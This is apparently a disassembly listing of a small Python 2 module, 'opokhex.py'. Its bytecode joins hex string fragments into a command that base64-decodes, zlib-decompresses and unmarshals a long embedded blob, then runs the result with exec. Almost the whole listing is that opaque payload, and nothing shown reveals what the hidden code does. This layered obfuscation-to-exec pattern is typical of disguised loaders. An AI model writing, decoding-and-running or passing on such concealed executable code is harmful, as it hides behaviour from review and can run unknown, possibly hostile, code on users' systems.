           5745 LOAD_CONST            1435 ('7838480a27')
           5748 BINARY_ADD          
           5749 LOAD_CONST            1436 ('27272e6465')
           5752 BINARY_ADD          
           5753 LOAD_CONST            1437 ('636f646528')
           5756 BINARY_ADD          
           5757 LOAD_CONST            1438 ('2762617365')
           5760 BINARY_ADD          
           5761 LOAD_CONST            1439 ('363427292e')
           5764 BINARY_ADD          
           5765 LOAD_CONST            1440 ('6465636f64')
           5768 BINARY_ADD          
           5769 LOAD_CONST            1441 ('6528277a6c')
           5772 BINARY_ADD          
           5773 LOAD_CONST            1442 ('6962272929')
           5776 BINARY_ADD          
           5777 LOAD_CONST            1443 ('29')
           5780 BINARY_ADD          
           5781 LOAD_CONST            1444 ('"')
           5784 BINARY_ADD          
           5785 LOAD_CONST            1445 ('.')
           5788 BINARY_ADD          
           5789 LOAD_CONST            1446 ('dec')
           5792 BINARY_ADD          
           5793 LOAD_CONST            1447 ('ode')
           5796 BINARY_ADD          
           5797 LOAD_CONST            1448 ('("')
           5800 BINARY_ADD          
           5801 LOAD_CONST            1449 ('h')
           5804 BINARY_ADD          
           5805 LOAD_CONST            1450 ('')
           5808 BINARY_ADD          
           5809 LOAD_CONST            1450 ('')
           5812 BINARY_ADD          
           5813 LOAD_CONST            1450 ('')
           5816 BINARY_ADD          
           5817 LOAD_CONST            1450 ('')
           5820 BINARY_ADD          
           5821 LOAD_CONST            1450 ('')
           5824 BINARY_ADD          
           5825 LOAD_CONST            1450 ('')
           5828 BINARY_ADD          
           5829 LOAD_CONST            1451 ('e')
           5832 BINARY_ADD          
           5833 LOAD_CONST            1450 ('')
           5836 BINARY_ADD          
           5837 LOAD_CONST            1450 ('')
           5840 BINARY_ADD          
           5841 LOAD_CONST            1450 ('')
           5844 BINARY_ADD          
           5845 LOAD_CONST            1452 ('x"')
           5848 BINARY_ADD          
           5849 LOAD_CONST            1453 (')')
           5852 BINARY_ADD          
           5853 LOAD_CONST            1454 (None)
           5856 DUP_TOP             
           5857 EXEC_STMT           
           5858 LOAD_CONST            1454 (None)
           5861 RETURN_VALUE        
   consts
      '0000'
      'ex'
      'ec"'
      '6578656328'
      '5f5f696d70'
      '6f72745f5f'
      '28276d6172'
      '7368616c27'
      '292e6c6f61'
      '6473282727'
      '27654a7956'
      '6d67573848'
      '4558797833'
      '6557344b37'
      '424f594946'
      '44734c7336'
      '4136487539'
      '386445427a'
      '4365374f7a'
      '4245306741'
      '594b377537'
      '7537753773'
      '656e4c7537'
      '753776782f'
      '3156585663'
      '75380a6c37'
      '762f4a5a39'
      '765a6d656d'
      '7461797265'
      '314a33354d'
      '383859484d'
      '773639696c'
      '4f70314270'
      '374d762f6f'
      '3036673235'
      '6e346d4165'
      '4d41484d43'
      '2b59443834'
      '4d4677494a'
      '6749624177'
      '574151730a'
      '4b74664677'
      '4f4a674362'
      '436b504673'
      '4b4c413257'
      '4163754335'
      '6342457344'
      '7859416177'
      '4956674972'
      '6731584171'
      '6d41313841'
      '47774f7067'
      '4531674272'
      '6772584132'
      '6d41644d42'
      '6d73433959'
      '440a487754'
      '7267773341'
      '464c416869'
      '4545504a43'
      '4146476368'
      '4241557251'
      '6c37495632'
      '4168384347'
      '774d4e6747'
      '6267733341'
      '356d414c73'
      '435859436d'
      '774e746748'
      '6267753341'
      '396d414873'
      '4350590a43'
      '6577736458'
      '5942753449'
      '5067342b41'
      '6a344c6477'
      '4f3567447a'
      '415637436e'
      '76694c3341'
      '336d416661'
      '5739667342'
      '2f59487877'
      '4144675454'
      '7745466742'
      '4979435773'
      '6f4f51414f'
      '4730746242'
      '0a59446f34'
      '4242774b44'
      '674f486779'
      '50416b5743'
      '476c4a7670'
      '6c54734b48'
      '4f32566d2b'
      '57566d2b32'
      '564f775963'
      '3635553744'
      '7379526352'
      '7750546741'
      '6e67704e45'
      '396c542f5a'
      '48414b4f42'
      '57630a426b'
      '34485a3441'
      '7a77566e67'
      '6248414f4f'
      '4265634238'
      '3448463441'
      '4c77555867'
      '596e414a75'
      '4252634269'
      '3448563441'
      '7277565867'
      '61756d4c79'
      '6c38447267'
      '5858676576'
      '4244654247'
      '63424f340a'
      '4764774362'
      '6757336764'
      '766c2f6735'
      '774a37674c'
      '334133756b'
      '584866432b'
      '344439344d'
      '4877495067'
      '4966417765'
      '4151384368'
      '34446a3074'
      '353676384a'
      '384b546350'
      '7757654273'
      '2f492f624d'
      '790a2f7566'
      '41382b4146'
      '38434a3443'
      '62774d5868'
      '465a765370'
      '7a66673238'
      '4474344162'
      '344b33774e'
      '7667486641'
      '7838473648'
      '6265673938'
      '50454f3238'
      '556e774366'
      '4270365450'
      '5434505069'
      '4b772f0a43'
      '7a34485069'
      '396a2f594c'
      '582f78656c'
      '2f4a66416c'
      '3846587746'
      '6642313053'
      '3358776666'
      '414e384533'
      '774c664274'
      '3842337758'
      '6641392b58'
      '636a384150'
      '77512f416a'
      '3847507745'
      '2f42543844'
      '0a5077652f'
      '384e723770'
      '64542f4666'
      '6931315075'
      '4e392f3633'
      '5876336667'
      '642b445034'
      '412f796c6a'
      '2f4250344d'
      '2f744c684f'
      '504e583844'
      '6677642f41'
      '5038452f77'
      '4c2f427638'
      '44376f5242'
      '4d480a4565'
      '694365534a'
      '7559774b75'
      '38344c3549'
      '705970765a'
      '38664c4141'
      '5742417542'
      '6861587349'
      '70477a6152'
      '72666f7268'
      '6644437765'
      '6359786241'
      '74636c4933'
      '362b464668'
      '616e692b44'
      '36374a670a'
      '75636a352b'
      '3054385868'
      '3673414659'
      '454b344756'
      '493537664b'
      '7269754772'
      '4673567350'
      '3141313639'
      '3166463745'
      '6c67447241'
      '6e57387436'
      '746a642f72'
      '674d6c6758'
      '6241652b43'
      '425948327a'
      '770a483870'
      '4e41527543'
      '6d4f594845'
      '7042474c6e'
      '5a6c2b4a32'
      '4441705367'
      '447971776b'
      '64636d3853'
      '4863627777'
      '32415a7543'
      '7a63446d59'
      '4175774a64'
      '674b624132'
      '3241647543'
      '37534b3232'
      '6531780a33'
      '6148564673'
      '5873486231'
      '6e4a492b64'
      '774d356746'
      '356e58726c'
      '466f497838'
      '57475a4b64'
      '665352694f'
      '7a4b784637'
      '3933413775'
      '332b69425a'
      '3767476d67'
      '6a31465633'
      '7668756a66'
      '59422b7a72'
      '0a6c566439'
      '3777663242'
      '7765414131'
      '7674546350'
      '395154516e'
      '4d4170714d'
      '41434e4a2b'
      '38684f4e68'
      '72657a7175'
      '6834424477'
      '5745523378'
      '2f6573724d'
      '6a6348386b'
      '6d41466d67'
      '715041305a'
      '477a0a2f56'
      '6b52793335'
      '32784c5a2f'
      '544d523266'
      '4377344473'
      '794a777245'
      '64482f4836'
      '65674b754a'
      '305a6a2f66'
      '616b794d33'
      '31354a5a4e'
      '6e434c6a50'
      '6858583038'
      '4470344178'
      '774a6a674c'
      '6e41334f0a'
      '4165644754'
      '6d2f6e6766'
      '5042426544'
      '43566e7671'
      '3678644a6e'
      '7865445336'
      '4c2f7a5a38'
      '6f446c794b'
      '3335654279'
      '3845563376'
      '69766a4a78'
      '7458675775'
      '4274654161'
      '37322b7238'
      '5076363845'
      '4e0a34455a'
      '7755385478'
      '39325a6362'
      '7747336774'
      '7641376541'
      '4f54376274'
      '474b4c6c37'
      '6752335257'
      '506a796433'
      '67486e4376'
      '7a4f4d2b58'
      '4f2b583377'
      '2f672b6942'
      '344344774d'
      '486f6c636e'
      '4867550a50'
      '43627a6578'
      '7738346333'
      '3179636974'
      '56552f6839'
      '394e792f77'
      '79757a344c'
      '6e496d6566'
      '7a2b503343'
      '2b42463778'
      '6e312f524c'
      '7558776176'
      '6746664261'
      '2b42313841'
      '5a34453777'
      '6c59337737'
      '0a436d5043'
      '4f7a524838'
      '47376b664f'
      '3239695033'
      '713435477a'
      '59594a7970'
      '302f673253'
      '656c725539'
      '35645a5250'
      '6a2f4f4d2b'
      '4179656678'
      '5a38446e77'
      '6566414638'
      '4d5270626a'
      '7362304a66'
      '426c0a3842'
      '5877315848'
      '4b66413350'
      '7667362b41'
      '6234356c2f'
      '362b686566'
      '6642742f78'
      '35507a6463'
      '6472534750'
      '4939384833'
      '77412f4244'
      '384b4e7879'
      '7634597a33'
      '3443666871'
      '354f6a2b62'
      '532f392b0a'
      '72506b352b'
      '4158347053'
      '64376e3762'
      '656c562f68'
      '2f7466674e'
      '2b43336b5a'
      '5050373844'
      '7677523945'
      '526e385565'
      '2f39547850'
      '61752f7533'
      '727771797a'
      '7550384c2b'
      '4376345738'
      '54352f6439'
      '780a2f5563'
      '303173662f'
      '436634462f'
      '75324e6966'
      '7a76666444'
      '70736e3947'
      '7548624250'
      '4741436d4c'
      '6362787672'
      '356344392f'
      '6c2b335237'
      '3373425046'
      '73514c4e51'
      '4e32316759'
      '4c41495737'
      '6272360a74'
      '435a514734'
      '7542786345'
      '5333584138'
      '7446597469'
      '57644c6761'
      '5737626b33'
      '52646a5775'
      '3072695836'
      '5962724d44'
      '3166747574'
      '307678782b'
      '5477544c64'
      '3931345638'
      '4476466276'
      '6866466271'
      '0a6a6d3244'
      '3171435675'
      '32772f7131'
      '4235734272'
      '3142315948'
      '6b3771684c'
      '7462412f5a'
      '7064317065'
      '4f59613175'
      '324e37554b'
      '497835612f'
      '2b48667466'
      '70686d7664'
      '7170474c54'
      '3550786274'
      '32750a737a'
      '31646a3959'
      '6a65594831'
      '77515a6743'
      '7467517843'
      '3335303572'
      '63772b2b6b'
      '3639616c46'
      '4c387a4755'
      '2b4f617746'
      '4b30472f5a'
      '414b333346'
      '5a35745248'
      '4d44473363'
      '35706d3643'
      '36365a640a'
      '7433357568'
      '742b626779'
      '323634362b'
      '62572b4c35'
      '566d427273'
      '4d30345939'
      '7757312b33'
      '41396c334f'
      '7658664164'
      '5565775535'
      '647a636872'
      '7a7a766939'
      '433969565a'
      '4546396930'
      '342b4b7550'
      '590a446466'
      '6470513361'
      '632b794236'
      '3153774a39'
      '674c374333'
      '6c39704872'
      '76726a754a'
      '372f33782f'
      '5541634343'
      '5942673771'
      '6875394863'
      '4230464e52'
      '6941426779'
      '6c662b727a'
      '5944416448'
      '41494f0a42'
      '5964315755'
      '6148532f30'
      '645a487a61'
      '3168486753'
      '4441447a41'
      '524867614f'
      '39396d6142'
      '3261517663'
      '7742783376'
      '3638546b42'
      '7a3038454a'
      '386e345467'
      '616e7a4b55'
      '737a657455'
      '0a63426f34'
      '58635a3742'
      '6a67546e44'
      '57584f6d64'
      '4c6e585041'
      '7565413863'
      '4436344146'
      '77346c7a6f'
      '5834666e46'
      '34424a774b'
      '62674d5841'
      '3675414665'
      '43712b5a53'
      '3732717064'
      '773234466c'
      '77480a7270'
      '63362b3832'
      '6c44756e37'
      '4272793745'
      '6477456276'
      '347635572f'
      '7063766c62'
      '7757336739'
      '7639536668'
      '4d70667765'
      '3455325231'
      '4637676233'
      '434e313770'
      '5579393448'
      '3777515067'
      '516643510a'
      '7648395962'
      '5041523054'
      '50744c5237'
      '4637386641'
      '342b414a38'
      '435234436a'
      '774e6e6748'
      '5067756641'
      '382b414638'
      '434a344362'
      '774d586747'
      '7667746641'
      '362b414e38'
      '435a346179'
      '3638336270'
      '2f0a423377'
      '4d764e7564'
      '4d42582f37'
      '4437357657'
      '366e4d3374'
      '4370394f4a'
      '3857633262'
      '6a724e6e46'
      '6c304d4e58'
      '556b325976'
      '684775534a'
      '72316b574f'
      '5a6c616d37'
      '4c4a426b57'
      '5356455644'
      '6238640a6c'
      '6e465a6c56'
      '6e524e3766'
      '4673476a69'
      '4556534a2b'
      '6530674751'
      '46786c7572'
      '626a476f57'
      '70626c4e52'
      '3549593757'
      '5a46495958'
      '5466684a54'
      '46626d4e52'
      '2b49524642'
      '3977763345'
      '784c4a4d79'
      '0a6b355a78'
      '6b2f707655'
      '777a43504f'
      '4333417933'
      '4f5463566c'
      '5576545162'
      '3662444741'
      '5231385341'
      '74526f7563'
      '627a4e2b56'
      '39714f544b'
      '38792f5349'
      '766170424b'
      '7931713047'
      '4970777143'
      '676d0a325a'
      '4f6d437071'
      '65646c546b'
      '343763736f'
      '2b706a6b44'
      '6d474b6264'
      '4754695143'
      '767131356b'
      '444c396445'
      '4431714971'
      '4f71736569'
      '3564737961'
      '66496b7132'
      '5655706c34'
      '2f71644a52'
      '6b51594a0a'
      '4c326c556f'
      '5241634456'
      '5147695949'
      '6c4b745479'
      '4e696c5276'
      '436f4b542b'
      '784a673548'
      '31524d3546'
      '6e73547049'
      '4a57364d65'
      '6f326d464f'
      '7048655855'
      '6b416a5776'
      '45314a6646'
      '793342314d'
      '710a6b306f'
      '6d434e4851'
      '494c516a6b'
      '5557644431'
      '5837505a70'
      '76496d5a57'
      '5945786f53'
      '4e3753654d'
      '78514b7245'
      '726d47424d'
      '663533326f'
      '5963793135'
      '5962466747'
      '2f62625274'
      '7553553555'
      '686b5a0a70'
      '476d33722f'
      '704e746269'
      '6f4c4b4765'
      '45326b7148'
      '2b5a444870'
      '6b6f685234'
      '6b6c59774b'
      '3434483236'
      '4c3071464f'
      '3844535270'
      '377a315368'
      '525644596d'
      '464b693834'
      '586f794b4a'
      '4c61626d76'
      '0a44305368'
      '554c555267'
      '6659626d36'
      '625552456d'
      '686849684f'
      '6e554d7378'
      '387a573671'
      '6a52747258'
      '664b6a4774'
      '6938713437'
      '61416a744e'
      '7854587a42'
      '447a456646'
      '6e764d426d'
      '596f557a6b'
      '664e0a4132'
      '7545475170'
      '585a537a36'
      '4a61735970'
      '325531516d'
      '4f504e4335'
      '56714f6c47'
      '5a7353746c'
      '706b62526f'
      '6262557436'
      '794557466f'
      '3172784457'
      '62556b4b63'
      '4e30546f65'
      '5870566973'
      '5770554b0a'
      '42354c4d52'
      '38752b4472'
      '49672f345a'
      '772b397079'
      '5a65777546'
      '4534776f37'
      '4b66443053'
      '7736673161'
      '6c304a5537'
      '594a4d6d76'
      '544c516932'
      '6e4c6e4d79'
      '6656454b6d'
      '79655a6937'
      '563246492b'
      '740a683561'
      '6a4c467272'
      '6b6e6d5339'
      '717a44556b'
      '6a47497a62'
      '674e453778'
      '4a78394e57'
      '565a704c78'
      '314e345139'
      '61754a6261'
      '6951305558'
      '4a75315547'
      '7474727075'
      '61326f6b47'
      '6d544b7057'
      '384f410a6b'
      '6e51596154'
      '4a65523158'
      '6130365a53'
      '66752b6d45'
      '4c75362b54'
      '6831733151'
      '576f44536d'
      '4e7933584b'
      '4163615930'
      '566c686264'
      '613561476e'
      '4f4e396e68'
      '7979734152'
      '6355725567'
      '544b6b6d4b'
      '0a30433064'
      '4e545a636f'
      '3645614658'
      '524e495975'
      '4537624373'
      '7967457344'
      '6846637445'
      '396a516e54'
      '5166754751'
      '4b59394d50'
      '49576d5746'
      '7137796e52'
      '6345713967'
      '774b613452'
      '715142755a'
      '624d0a5635'
      '334b6a6370'
      '5973363773'
      '7363374a4c'
      '6c35736c53'
      '4b724a445a'
      '726b736935'
      '3379707352'
      '715772704c'
      '46494a4242'
      '7168475857'
      '792f412b34'
      '7a466e5754'
      '624971717a'
      '78564d6232'
      '627163500a'
      '575a5a6953'
      '4b524b4935'
      '354b4f7a4b'
      '5364697172'
      '7a624b6132'
      '7257734e41'
      '4b7761796a'
      '6557647441'
      '6d32513575'
      '62564a6f34'
      '5053727238'
      '497961514c'
      '6b55592b53'
      '6959717439'
      '7971373549'
      '440a31477a'
      '5074335231'
      '795879314c'
      '68634f6251'
      '4d64745362'
      '5965445a4a'
      '2b6866394a'
      '7633416354'
      '6939454b57'
      '6b41306f39'
      '6e4f2f4c4f'
      '32314b3367'
      '5554704d56'
      '6335567853'
      '6b70436f35'
      '5a69510a58'
      '4953462b2b'
      '706c575047'
      '687779626a'
      '74336d4336'
      '5131534b39'
      '6771384f34'
      '6954776473'
      '4864777965'
      '5549642b4f'
      '4159646264'
      '5552735639'
      '6831553563'
      '3568334b33'
      '7661586a55'
      '71586b6a38'
      '0a75734643'
      '4542642b6a'
      '6d5479555a'
      '742b564361'
      '5463657552'
      '5a2f7a3530'
      '4d542b574d'
      '634d527962'
      '686c495865'
      '7372765871'
      '694d5a706b'
      '79662f4143'
      '6d78724c4b'
      '656b6a5547'
      '6a4a2f7671'
      '57460a6f52'
      '356a7a395a'
      '78416b4f53'
      '476257436a'
      '495a365869'
      '6249415353'
      '71774f5a6f'
      '4165754c41'
      '654f6d386d'
      '5146387a61'
      '574a394862'
      '3547596167'
      '69546d4f47'
      '7366313773'
      '5454587343'
      '73624e670a'
      '4179317773'
      '7336337646'
      '526e326a4b'
      '4d4534394b'
      '6a55693073'
      '526848734a'
      '5533665a75'
      '5a55357663'
      '6e4672376b'
      '4a74545036'
      '70706b4a72'
      '6d3955576c'
      '715a705a44'
      '7a56547478'
      '7733785169'
      '6c0a2b6462'
      '7043747230'
      '79444a6830'
      '6e2b373447'
      '72614b726b'
      '5a636a7171'
      '58636b7754'
      '417259747a'
      '6b774f6971'
      '4d666e564e'
      '3457357334'
      '614a506961'
      '6d472b7071'
      '7a68714266'
      '3246367766'
      '6244720a50'
      '746b6a6f72'
      '66714e324d'
      '642b663343'
      '742b306761'
      '565132397a'
      '61626d674c'
      '7156734761'
      '7863743647'
      '646f635a78'
      '6832783163'
      '6161625138'
      '314f2b3363'
      '5275544561'
      '3074595951'
      '6e364a5932'
      '0a45627859'
      '44732f5733'
      '31754e5862'
      '7a43684e6d'
      '3663386c43'
      '5677383151'
      '6d39375375'
      '314d565078'
      '4d52315679'
      '7347645a44'
      '54524a3950'
      '6f4e4f326f'
      '484e2b752f'
      '504e34676a'
      '7733794f6f'
      '6b4d0a6954'
      '577a634d7a'
      '744e4a3543'
      '7375543875'
      '6d57316c6b'
      '4d31385659'
      '3868517a42'
      '4a64764771'
      '6377756c39'
      '2b61657453'
      '5a2b434243'
      '655a45504d'
      '32345a3053'
      '6a504d7973'
      '637170756e'
      '325641790a'
      '7147775574'
      '70506d5763'
      '356a7a6e4c'
      '5548515461'
      '48394e5250'
      '7252375a78'
      '70676f516b'
      '7a374d4a45'
      '32554b3133'
      '35352b3431'
      '73646d356b'
      '6456616f32'
      '4b344e6b51'
      '3347534443'
      '4f2f627646'
      '310a47426e'
      '4c532b334b'
      '6a456b4452'
      '563349686c'
      '67384e4f6b'
      '6a7566516e'
      '6945557855'
      '6530335a75'
      '6573553867'
      '704c787661'
      '7864715974'
      '7039373536'
      '4d556a6b75'
      '62627a5338'
      '756e4e686b'
      '2b496c0a2f'
      '5978766f51'
      '4a59585436'
      '772f664c47'
      '556f4f6232'
      '517532646b'
      '42776e304a'
      '76687a7779'
      '4454495a6a'
      '3878327843'
      '4d4c2f6168'
      '537363666d'
      '684b4e526c'
      '7979344f56'
      '3030633237'
      '4f786c6875'
      '0a54715752'
      '30706f6938'
      '79587a7779'
      '62414f5934'
      '7154625676'
      '306b646459'
      '6448304f42'
      '324a42724e'
      '784f6f7278'
      '66716a714e'
      '7676623073'
      '30336f6331'
      '597241724e'
      '4b6272627a'
      '427947304c'
      '65780a6e55'
      '35554d6e69'
      '76354b4b59'
      '3063427331'
      '4271334546'
      '53304a4974'
      '674f54626b'
      '6373375134'
      '396a67396f'
      '4f4e6e2f62'
      '4939435170'
      '347455336a'
      '7a4f4a7745'
      '6c4f527a39'
      '71444b7039'
      '565571740a'
      '3067704366'
      '624477495a'
      '5070367942'
      '725776647a'
      '4464635568'
      '4b7a593264'
      '7270334555'
      '4c35796178'
      '3065514543'
      '3445664b44'
      '5351384b30'
      '346874707a'
      '536e6c4f47'
      '6474777264'
      '74304e5834'
      '360a334b6d'
      '73315a6d6f'
      '6b37686758'
      '734354696c'
      '5179315a7a'
      '3268703562'
      '6a5845634f'
      '6b70523132'
      '4272396b36'
      '332b754d45'
      '4762655579'
      '7854644775'
      '6f35624356'
      '4736724a63'
      '732b505863'
      '3049300a52'
      '626d4f5249'
      '61594c4376'
      '4c5a517576'
      '6b79397342'
      '4462376555'
      '302f4f4256'
      '5841375a4c'
      '716d715154'
      '63456d5932'
      '774b456b58'
      '564644522f'
      '626a547235'
      '376f395852'
      '6e3474712b'
      '7855417637'
      '0a69365959'
      '5375324f4c'
      '4d68656b32'
      '4174633465'
      '4b7153592b'
      '547244656f'
      '534b644972'
      '6250474633'
      '6149356d4d'
      '316d30344f'
      '7174335632'
      '6d34384b45'
      '546b364449'
      '494246586a'
      '4d4a6c6771'
      '72770a4d48'
      '7a5a484b6e'
      '304f386f31'
      '6c78477230'
      '34544c476a'
      '436e4e7559'
      '32446b3843'
      '4e5a625a4b'
      '4b71685558'
      '556b6f5646'
      '7351376157'
      '5261425165'
      '395a485357'
      '2f52654f72'
      '322f45694c'
      '6570734c0a'
      '4e6c496e39'
      '7372475744'
      '4979547269'
      '734a483352'
      '595a564552'
      '305868566e'
      '626a6f7a4c'
      '6645643042'
      '7337726858'
      '2b78616f52'
      '46716f6b36'
      '6e764e5a45'
      '755236744d'
      '3978557a6c'
      '7638384e6a'
      '510a6e6a50'
      '30772b6864'
      '362f474172'
      '6576705348'
      '646c636b74'
      '47324e6f74'
      '3869354833'
      '6f375a482f'
      '6b5a564178'
      '3739343775'
      '6138357851'
      '324f6f2f66'
      '426c314b4b'
      '5751327278'
      '33374c6f72'
      '6661390a6a'
      '454b6c6245'
      '3255705678'
      '7146413253'
      '4d56616e33'
      '5338594f59'
      '3561646174'
      '6c32427859'
      '77726d2b70'
      '5658643253'
      '5476556c79'
      '536b4d6168'
      '3479444d65'
      '30664b7244'
      '42377a424a'
      '346d653733'
      '0a2f633155'
      '6e4979366c'
      '6e74425965'
      '4d34513338'
      '68494c4862'
      '4d4a4c3442'
      '796c696f43'
      '3672357a32'
      '51656f702b'
      '4656463748'
      '6875663766'
      '6251484959'
      '4d504b5777'
      '7575574d30'
      '6151667554'
      '74770a4e6b'
      '4e49523579'
      '4f2b4c4f41'
      '66736a6778'
      '4d57356873'
      '784a673079'
      '59692b6f52'
      '6244443931'
      '43596e4a72'
      '6432657a6f'
      '364b756e35'
      '5831754370'
      '737a437076'
      '5046777362'
      '5749314e51'
      '483555560a'
      '782f696f33'
      '576f566e4c'
      '6934465565'
      '36346f3477'
      '5535366b4f'
      '6d7a727444'
      '616d543275'
      '35704f4a35'
      '3174444b6b'
      '5569365253'
      '6c50676f66'
      '32625a556a'
      '756d553231'
      '7458656478'
      '784e694f32'
      '470a6c327a'
      '5a4d394841'
      '726952687a'
      '6c782b7859'
      '376c61622b'
      '7833377a51'
      '5457326975'
      '2f30453168'
      '747a434f4d'
      '53477a3733'
      '39754d6b61'
      '636c475175'
      '35496c644c'
      '495073616c'
      '6552534170'
      '436e750a30'
      '3070534f32'
      '7174335662'
      '64616b7169'
      '304e59796f'
      '6564714b6a'
      '7278555445'
      '476b39696d'
      '61657a7079'
      '4555477170'
      '7534454d51'
      '4c51657a73'
      '7556395772'
      '62317a6530'
      '65766f5944'
      '5749385475'
      '0a31483161'
      '7266696353'
      '5a656e7968'
      '7833324257'
      '6e4973644c'
      '374b665630'
      '6865374751'
      '4c317a6e55'
      '7250576b49'
      '6c7a5a3739'
      '695844354c'
      '6439485361'
      '2f6c512b72'
      '6572416642'
      '39464d7535'
      '46640a7175'
      '374b644d47'
      '566d693462'
      '436234746d'
      '6d32486a65'
      '3332673638'
      '396c47694d'
      '3442505659'
      '4d2f624946'
      '4362706a6b'
      '4e5547516d'
      '396d4e4532'
      '6b396a2f39'
      '6966556949'
      '363775495a'
      '595746710a'
      '7947306b66'
      '36617a4f4a'
      '6936487679'
      '53484c7974'
      '7057366b64'
      '53394a4e31'
      '366f543430'
      '4f2b743558'
      '4c54397a6b'
      '364d534777'
      '6c625a347a'
      '68755a6b6d'
      '3674615179'
      '4b30536d56'
      '4857787859'
      '380a792b4e'
      '45446c4a36'
      '53514e554f'
      '4e68315153'
      '4859732f4d'
      '6736545176'
      '7235466836'
      '5336476274'
      '77524f7163'
      '4966665546'
      '6371753663'
      '462b316442'
      '586c75684c'
      '4c334d6b4a'
      '6e5a74344c'
      '6d6e690a67'
      '6b76467a62'
      '7645476e44'
      '4a487a7045'
      '5a6578792b'
      '6858416642'
      '4367627746'
      '574334686e'
      '672b427733'
      '6e37483051'
      '386b4e7454'
      '722f6b6c39'
      '554f796433'
      '2f5a566878'
      '724d787a51'
      '5642696a65'
      '0a42476a6f'
      '3430324137'
      '4e72534c4f'
      '656c55666f'
      '4e346d5132'
      '3168693848'
      '5945756247'
      '3535386b39'
      '3664557875'
      '766c586f56'
      '686d742f50'
      '612f4e3268'
      '4d6b6c4376'
      '797a555848'
      '7253574748'
      '4e590a6251'
      '504630476a'
      '5932307a35'
      '6b75537451'
      '2b76343352'
      '3773383034'
      '693131757a'
      '6c766d3763'
      '764f66444d'
      '5a38586449'
      '56782b692b'
      '566d6c5172'
      '794d553032'
      '7a64664c53'
      '31544d5256'
      '71366b340a'
      '50506a3133'
      '725a587964'
      '683969497a'
      '684b375173'
      '69706d4e5a'
      '6a6b53554d'
      '3363736f47'
      '7875583475'
      '422f745573'
      '472f72366d'
      '634d477a63'
      '3469506766'
      '54304e4447'
      '7650576672'
      '57454a5764'
      '6f0a757861'
      '586847384f'
      '794a677944'
      '515859437a'
      '7148686171'
      '7272476550'
      '4861516a64'
      '79424a717a'
      '7057643946'
      '2b7a7a684f'
      '375a727138'
      '5263314357'
      '35735a6c61'
      '442b6e314a'
      '46576f2b67'
      '4d6c520a69'
      '55704b4279'
      '6d53557063'
      '5553626d6a'
      '7637365878'
      '75766b4e53'
      '447a394159'
      '69324b7730'
      '7778783149'
      '546650364f'
      '5246517934'
      '5a647a6161'
      '712b68494c'
      '6168764479'
      '5268504659'
      '614f675637'
      '0a7973522f'
      '4e536b6953'
      '644352704d'
      '796f784978'
      '36614c7453'
      '2f2b325a75'
      '464a703452'
      '3758746b33'
      '786c326c6e'
      '534f467054'
      '3172545837'
      '36747a554a'
      '5232426d6c'
      '356d39674f'
      '6461656378'
      '6d6b0a4875'
      '35564f6b57'
      '756d354849'
      '6e5a776857'
      '4739555273'
      '6247304354'
      '49354b3150'
      '3250495a30'
      '37564d3537'
      '6c324c6575'
      '5250576665'
      '3067594253'
      '4c2b356565'
      '744e583775'
      '536a725372'
      '5142705a0a'
      '3661546842'
      '706b6c7075'
      '6565667362'
      '4b636e3651'
      '3248377a7a'
      '4c30743857'
      '5945303163'
      '7463455075'
      '2b2b2b592b'
      '4277364f78'
      '3970655031'
      '4378364c66'
      '6b62786b44'
      '664f742b64'
      '424d4c692f'
      '650a485853'
      '6b4b736b31'
      '7170416553'
      '435a634f4f'
      '4d484f6f7a'
      '636d4b482f'
      '37646a3748'
      '477a556d5a'
      '4f70616377'
      '783074414a'
      '357545456f'
      '534879496b'
      '3870766952'
      '546e624566'
      '4356315162'
      '55556b0a44'
      '636c754748'
      '3172534843'
      '616d427850'
      '3155304270'
      '7662647559'
      '4755653537'
      '3232576239'
      '4b4672614d'
      '64502f484c'
      '416e6b4f61'
      '67756e5966'
      '42556a4b66'
      '5953775645'
      '5648336454'
      '7147755230'
      '0a64586a79'
      '57586e2f38'
      '346350344d'
      '4976725a58'
      '395247494f'
      '65507a2f4a'
      '57554f6550'
      '785548454b'
      '776e393738'
      '4178785473'
      '42797a4867'
      '5748547561'
      '6b69503754'
      '4977704675'
      '4577792f30'
      '365a0a5466'
      '3842637444'
      '55356a706a'
      '304d796949'
      '7050353566'
      '545a2b4b64'
      '6a66764c7a'
      '4f66783833'
      '56306e3032'
      '58322f5068'
      '6e32725442'
      '6a48726174'
      '4d6c553076'
      '307a692f71'
      '644d585047'
      '59644f620a'
      '4f564e6d48'
      '6a39374164'
      '7875664d53'
      '4d77544748'
      '4e35745331'
      '566c556172'
      '374f2b2f2b'
      '5076366430'
      '2f672b352b'
      '7838480a27'
      '27272e6465'
      '636f646528'
      '2762617365'
      '363427292e'
      '6465636f64'
      '6528277a6c'
      '6962272929'
      '29'
      '"'
      '.'
      'dec'
      'ode'
      '("'
      'h'
      ''
      'e'
      'x"'
      ')'
      None
   names ('__doc__',)
   varnames ()
   freevars ()
   cellvars ()
   filename 'opokhex.py'
   name '<module>'
   firstlineno 1
   lnotab
      0600ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00
      ff00ff00ff00ff00ff00ff00ff00ff00f200
